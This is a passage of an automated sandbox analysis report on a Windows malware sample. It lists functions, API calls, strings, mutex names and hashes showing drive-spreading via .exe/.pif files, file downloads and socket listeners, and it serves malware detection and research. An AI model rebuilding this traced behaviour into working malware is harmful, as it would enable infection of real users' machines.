                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15e135cff8904ada979803181d7fa09d1cb7b8f45b7f8e802861b332618d3cb7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B95152B5810218EFDF30DB64EC8CBD97778AB58301F1085D9E649A2184DBB4AAD4CF50
                                                                                                                                                                                                                                    Function 0128A2F5 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 150stringsleepfileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1006 128a2f5-128a3a4 call 12844cb Sleep GetTempPathA lstrlen 1009 128a3b8-128a3bf 1006->1009 1010 128a3a6-128a3b2 lstrcat 1006->1010 1011 128a542-128a550 RtlExitUserThread 1009->1011 1012 128a3c5-128a435 lstrlen lstrcpy lstrcat call 1284060 FindFirstFileA 1009->1012 1010->1009 1015 128a43b-128a451 FindNextFileA 1012->1015 1016 128a51c-128a523 1012->1016 1015->1016 1019 128a457-128a49c lstrcat lstrlen * 2 1015->1019 1017 128a532-128a53d Sleep 1016->1017 1018 128a525-128a52c FindClose 1016->1018 1017->1009 1018->1017 1020 128a4ca-128a4d5 1019->1020 1021 128a49e-128a4b7 lstrcmpiA 1019->1021 1022 128a50c-128a517 Sleep 1020->1022 1023 128a4d7-128a4e1 1020->1023 1021->1020 1024 128a4b9-128a4c2 call 128a26e 1021->1024 1022->1015 1023->1022 1026 128a4e3-128a4fb lstrcmpiA 1023->1026 1027 128a4c7 1024->1027 1026->1022 1028 128a4fd-128a509 call 128a2ad 1026->1028 1027->1020 1028->1022
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 012844CB: InterlockedExchange.KERNEL32(012990C0,0128A192), ref: 012844E9
                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 0128A374
                                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000100,00000000), ref: 0128A386
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 0128A393
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,01283CAC), ref: 0128A3B2
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 0128A3CC
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0128A3E6
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,01283CB0), ref: 0128A3F8
                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(00000000,00000000), ref: 0128A422
                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(000000FF,00000000), ref: 0128A449
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 0128A473
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 0128A480
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 0128A493
                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32(00000000,012826F0), ref: 0128A4AF
                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32(00000000,_Rar), ref: 0128A4F3
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000100), ref: 0128A511
                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0128A52C
                                                                                                                                                                                                                                    • Sleep.KERNEL32(000927C0), ref: 0128A537
                                                                                                                                                                                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 0128A544
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlen$FindSleeplstrcat$Filelstrcmpi$CloseExchangeExitFirstInterlockedNextPathTempThreadUserlstrcpy
                                                                                                                                                                                                                                    • String ID: _Rar
                                                                                                                                                                                                                                    • API String ID: 932915221-536834240
                                                                                                                                                                                                                                    • Opcode ID: 0733e7eb6a6ef1adfebe6e5fd0392222da9031052779e6b609fb9a8bd95f80fc
                                                                                                                                                                                                                                    • Instruction ID: 891eaebd03428483826076abdd2ee720cdb9d73c0b57b51ff8df41f09466b20a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0733e7eb6a6ef1adfebe6e5fd0392222da9031052779e6b609fb9a8bd95f80fc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A51CF719012199BDF20EB64EC48BEE7779AB84705F0084E9E60EA61D4DB75ABC4CF60
                                                                                                                                                                                                                                    Function 0129392D Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 141sleeplibrarythreadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1081 129392d-1293967 call 1298060 1084 1293968-129396f 1081->1084 1085 129397e-12939b5 lstrcpy LoadLibraryA 1084->1085 1086 1293971-129397c Sleep 1084->1086 1087 12939cf-12939d6 1085->1087 1088 12939b7-12939ca GetProcAddress 1085->1088 1086->1084 1089 12939d8-1293a12 FreeLibrary lstrcat LoadLibraryA 1087->1089 1090 1293a2c-1293a94 call 129377a CreateThread call 12841c6 CreateThread call 12841c6 Sleep 1087->1090 1088->1087 1089->1090 1091 1293a14-1293a27 GetProcAddress 1089->1091 1098 1293ab0-1293ab7 1090->1098 1091->1090 1099 1293ab9-1293ae5 Sleep CreateThread call 12841c6 1098->1099 1100 1293ae7-1293b0c Sleep call 129174a * 2 1098->1100 1099->1098 1108 1293b19-1293b20 1100->1108 1109 1293b5e Sleep 1108->1109 1110 1293b22-1293b29 1108->1110 1109->1108 1110->1109 1111 1293b2b-1293b32 1110->1111 1111->1109 1113 1293b34-1293b56 call 1284060 call 129195d 1111->1113 1117 1293b5b 1113->1117 1117->1109
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00001000), ref: 01293976
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,01282714), ref: 0129398B
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(00000000), ref: 012939A2
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,01282700), ref: 012939C4
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 012939DF
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,012822B0), ref: 012939F2
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(00000000), ref: 012939FF
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,01282700), ref: 01293A21
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,01293062,00000000,00000000,00000000), ref: 01293A49
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,01291E9B,00000000,00000000,?), ref: 01293A70
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000400), ref: 01293A84
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000400), ref: 01293AAA
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,01291CE3,0000005A,00000000,?), ref: 01293AD6
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000400), ref: 01293AEC
                                                                                                                                                                                                                                    • Sleep.KERNEL32(000DBBA0), ref: 01293B13
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Sleep$CreateLibraryThread$AddressLoadProc$Freelstrcatlstrcpy
                                                                                                                                                                                                                                    • String ID: Z
                                                                                                                                                                                                                                    • API String ID: 4104366077-1505515367
                                                                                                                                                                                                                                    • Opcode ID: a82d1bbcccd8ecc3cca1cd71158ef37eceacc9e13b4da9804255f6246d2a9d2f
                                                                                                                                                                                                                                    • Instruction ID: f2d2c87bd411ab94066e52246f0af92ab265879b33d90d8caba09f1f4696c74c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a82d1bbcccd8ecc3cca1cd71158ef37eceacc9e13b4da9804255f6246d2a9d2f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B519975A20285EBEF31DB68EC09BE93774BB48702F008198E749A61C4D7F42AD4CB61
                                                                                                                                                                                                                                    Function 01287A3A Relevance: 15.1, APIs: 10, Instructions: 122networkthreadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • htons.WS2_32(00000FF1), ref: 01287AE9
                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000002,00000000), ref: 01287B06
                                                                                                                                                                                                                                    • setsockopt.WS2_32(?,0000FFFF,00001002,00100000,00000004), ref: 01287B44
                                                                                                                                                                                                                                    • bind.WS2_32(?,00000002,00000010), ref: 01287B5A
                                                                                                                                                                                                                                    • closesocket.WS2_32(?), ref: 01287C31
                                                                                                                                                                                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 01287C39
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExitThreadUserbindclosesockethtonssetsockoptsocket
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3895830221-0
                                                                                                                                                                                                                                    • Opcode ID: 4d532038f1264c0b0a0f57266e2ef67f8fe505b5dc33358f8efc8b1edebde4f6
                                                                                                                                                                                                                                    • Instruction ID: 7f8becdfc106cb13bec097bfdcc8fdfe130e34ef00b09c74e968a783deba64e0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d532038f1264c0b0a0f57266e2ef67f8fe505b5dc33358f8efc8b1edebde4f6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78513A70A11398EBEB309F64DD09BD9B6B4BF48740F1042E9E289AB2D4D7F45AC48F54
                                                                                                                                                                                                                                    Function 01290945 Relevance: 13.6, APIs: 9, Instructions: 146networkfilestringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,?), ref: 012909A3
                                                                                                                                                                                                                                      • Part of subcall function 0128A677: GetTickCount.KERNEL32 ref: 0128A6C5
                                                                                                                                                                                                                                      • Part of subcall function 0128A677: GetTickCount.KERNEL32 ref: 0128A6E6
                                                                                                                                                                                                                                      • Part of subcall function 0128A677: lstrlen.KERNEL32(?,012826B8,00000000), ref: 0128A6F8
                                                                                                                                                                                                                                      • Part of subcall function 0128A677: wsprintfA.USER32 ref: 0128A704
                                                                                                                                                                                                                                    • InternetOpenA.WININET(01282120,00000001,00000000,00000000,00000000), ref: 01290A18
                                                                                                                                                                                                                                    • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000000,00000000), ref: 01290A4A
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 01290A7F
                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 01290AA5
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 01290AED
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 01290B5D
                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 01290B73
                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 01290B89
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Internet$CloseFileHandle$CountOpenTick$CreateReadWritelstrcpylstrlenwsprintf
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 999627789-0
                                                                                                                                                                                                                                    • Opcode ID: 8809a1cd7e0e8a1d6a9cc3e35225092048e9d5fdd1a407d005bd64e6499d26d4
                                                                                                                                                                                                                                    • Instruction ID: 258ddd0f3c0da686e8e2e972bb48e8792651a9b6b19b2073ba586c7b8663cde1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8809a1cd7e0e8a1d6a9cc3e35225092048e9d5fdd1a407d005bd64e6499d26d4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0513A7191061DABEF34CF58DC58BEAB779AB4431AF0045D8E309A6190DBB46BC4CF94
                                                                                                                                                                                                                                    Function 012883C9 Relevance: 12.1, APIs: 8, Instructions: 83networkthreadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 012883EA
                                                                                                                                                                                                                                    • htons.WS2_32(00000FDE), ref: 0128840B
                                                                                                                                                                                                                                    • bind.WS2_32(000000FF,00000002,00000010), ref: 0128842C
                                                                                                                                                                                                                                    • closesocket.WS2_32(00000000), ref: 012884A3
                                                                                                                                                                                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 012884AB
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExitThreadUserbindclosesockethtonssocket
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3582385377-0
                                                                                                                                                                                                                                    • Opcode ID: e4209110843c42a0c95a3564306dfc39384d0563ba1078fa625d6ddd49d4b93c
                                                                                                                                                                                                                                    • Instruction ID: 3415400f904e2d265fffef1be3924f75299e69d59929fd254f752e3066824522
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4209110843c42a0c95a3564306dfc39384d0563ba1078fa625d6ddd49d4b93c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB316175A21309EBEB20EFE8EC0EBAEBA74EF44701F50825DE701A61D0D6B45610CB91
                                                                                                                                                                                                                                    Function 01293062 Relevance: 75.7, APIs: 39, Strings: 4, Instructions: 428sleepfiletimeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 613 1293062-1293188 call 1298060 call 12844cb Sleep call 1292fff 620 129318b-12931a5 call 128e329 613->620 623 12931b4-12931be 620->623 624 12931a7-12931b2 Sleep 620->624 625 1293744-1293777 RtlExitUserThread 623->625 626 12931c4-12931ce 623->626 624->620 626->625 628 12931d4-12931e0 626->628 628->625 629 12931e6-12931f3 628->629 629->625 630 12931f9-1293200 629->630 630->625 631 1293206-129324e call 1292ebc Sleep GetLogicalDrives 630->631 635 1293734-129373f Sleep 631->635 636 1293254-1293272 631->636 635->630 637 1293278-12932b6 GetDriveTypeA 636->637 638 129372f 636->638 637->638 639 12932bc-12932f9 lstrcat CreateFileA 637->639 638->635 640 12932ff-1293337 GetFileTime FileTimeToSystemTime 639->640 641 1293522-129353c GetFileAttributesA 639->641 644 129333d-1293359 640->644 645 1293515-129351c CloseHandle 640->645 642 1293569-1293592 CreateFileA 641->642 643 129353e-1293566 SetFileAttributesA DeleteFileA call 128a2ad 641->643 642->638 647 1293598-129361d GetSystemTime SystemTimeToFileTime call 128a16b call 12844cb 642->647 643->642 644->645 648 129335f-12933b4 call 1284060 ReadFile CharLowerA lstrlen 644->648 645->641 659 129361f-1293631 lstrcat 647->659 660 1293633-129363f lstrcat 647->660 655 12933ba-12933d7 call 1288deb 648->655 656 1293510 648->656 655->656 663 12933dd-12933f0 655->663 656->645 662 1293645-12936ed call 1292b8e lstrlen WriteFile SetFileTime CloseHandle SetFileAttributesA CreateFileA 659->662 660->662 662->638 670 12936ef-1293729 WriteFile CloseHandle SetFileAttributesA 662->670 663->656 666 12933f6-12933ff 663->666 668 129350b 666->668 669 1293405-1293417 666->669 668->656 671 1293419-129341f 669->671 672 1293422-1293425 669->672 670->638 671->672 673 129342b-1293437 672->673 674 1293439-1293445 673->674 675 1293465-129348f lstrcpy GetFileAttributesA 673->675 674->675 678 1293447-1293452 674->678 676 1293509 675->676 677 1293491-12934c7 CloseHandle CreateFileA 675->677 676->656 677->676 680 12934c9-1293503 WriteFile CloseHandle SetFileAttributesA 677->680 678->675 679 1293454-1293463 678->679 679->673 680->676
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 012844CB: InterlockedExchange.KERNEL32(012990C0,0128A192), ref: 012844E9
                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 01293176
                                                                                                                                                                                                                                      • Part of subcall function 01292FFF: CreateFileA.KERNEL32(0129382E,40000000,00000002,00000000,00000004,00000020,00000000,?,0129382E), ref: 0129302B
                                                                                                                                                                                                                                      • Part of subcall function 01292FFF: WriteFile.KERNEL32(000000FF,012626B0,00000401,00000000,00000000), ref: 0129304E
                                                                                                                                                                                                                                      • Part of subcall function 01292FFF: CloseHandle.KERNEL32(000000FF), ref: 01293058
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00004E20), ref: 012931AC
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00004E20), ref: 01293210
                                                                                                                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 01293220
                                                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 012932A3
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,01282740), ref: 012932CA
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 012932E6
                                                                                                                                                                                                                                    • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 0129331B
                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0129332F
                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,00000FA0,?,00000000), ref: 01293391
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$SleepTime$Create$CloseDriveDrivesExchangeHandleInterlockedLogicalReadSystemTypeWritelstrcat
                                                                                                                                                                                                                                    • String ID: .exe$.pif$:$\
                                                                                                                                                                                                                                    • API String ID: 2892063643-4138429844
                                                                                                                                                                                                                                    • Opcode ID: 0a12a35ac4b7837cd595958113776162c4007908799be25c8aaf9ddc3636fb56
                                                                                                                                                                                                                                    • Instruction ID: 52a5307113779c6a012bd739a21894dfe18f1587b36d61848d42cda95dd267bc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a12a35ac4b7837cd595958113776162c4007908799be25c8aaf9ddc3636fb56
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A027EB5910269DBDF34DB68DC88BEEB775BB89700F0081D9E209E61C4D774AAA4CF50
                                                                                                                                                                                                                                    Function 05B30005 Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 162libraryfilesleepCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 835 5b30005-5b30016 836 5b3002b-5b3003f 835->836 837 5b30018-5b3004e 835->837 839 5b300c6-5b30134 LoadLibraryExA call 5b30260 call 5b30265 SetErrorMode CreateFileMappingA * 2 836->839 840 5b30050-5b3005c 837->840 841 5b3005e-5b30067 837->841 855 5b30170-5b30190 CreateThread 839->855 856 5b30136-5b3014a MapViewOfFile 839->856 843 5b30068-5b3006d 840->843 841->843 846 5b30074-5b3007f 843->846 847 5b3006f 843->847 850 5b30081 846->850 851 5b30086-5b300c0 call 5b30286 call 5b30260 call 5b30286 call 5b30260 846->851 849 5b301ba-5b301c1 847->849 853 5b30253-5b3025b 849->853 854 5b301c7-5b301dd GetModuleFileNameA 849->854 850->849 851->839 853->849 859 5b30240-5b30245 Sleep 854->859 860 5b301df-5b3020a LoadLibraryExA GetProcAddress 854->860 858 5b30196-5b3019d 855->858 856->855 861 5b3014c-5b30159 856->861 865 5b301a9-5b301b8 858->865 866 5b3019f-5b301a7 858->866 863 5b3024b-5b3024d ExitProcess 859->863 860->859 867 5b3020c-5b3023e CreateMutexA GetLastError 860->867 861->855 862 5b3015b-5b3016c 861->862 862->855 869 5b3016e 862->869 865->849 865->858 866->858 867->859 867->863 869->855
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(KERNEL32.DLL,00000000,00000000), ref: 05B300D1
                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00008002), ref: 05B300F8
                                                                                                                                                                                                                                    • CreateFileMappingA.KERNEL32(-00000001,00000000,00000004,00000000,00008000,hh8geqpHJTkdns6), ref: 05B30112
                                                                                                                                                                                                                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,purity_control_7728), ref: 05B3012C
                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00015400), ref: 05B30142
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,05B30693), ref: 05B30190
                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,05B31778,000001FE), ref: 05B301D5
                                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(SHELL32.DLL,00000000,00000000), ref: 05B301F4
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ShellExecuteA), ref: 05B30202
                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 05B3022F
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 05B30236
                                                                                                                                                                                                                                    • Sleep.KERNEL32(000927C0), ref: 05B30245
                                                                                                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 05B3024D
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2249113471.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_5b30000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateFile$ErrorLibraryLoadMapping$AddressExitLastModeModuleMutexNameProcProcessSleepThreadView
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                    • API String ID: 622795131-162185446
                                                                                                                                                                                                                                    • Opcode ID: 4dfdd8c8ea759f40701b5fec77ac64174a416b025a1b0df71bc92e610429bfa5
                                                                                                                                                                                                                                    • Instruction ID: ff7dce726ae009159e240d3940e3b47e37ce975c406eab4691207a5e696f1255
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4dfdd8c8ea759f40701b5fec77ac64174a416b025a1b0df71bc92e610429bfa5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50614B7164428CABEF10EFA0CC4EFAA3769FF04B01F540555EA09BE1E0D6B1B6448B5A
                                                                                                                                                                                                                                    Function 01284D96 Relevance: 37.1, APIs: 18, Strings: 3, Instructions: 395registrystringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
